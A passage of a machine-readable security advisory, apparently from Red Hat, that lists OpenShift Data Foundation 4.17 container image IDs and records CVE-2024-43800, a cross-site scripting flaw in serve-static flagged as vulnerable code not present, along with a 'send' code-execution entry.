"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "rhdh-hub-container 1.2 and 1.3 have included patches for this vulnerability.",
"title": "Statement"
},
{
"category": "general",
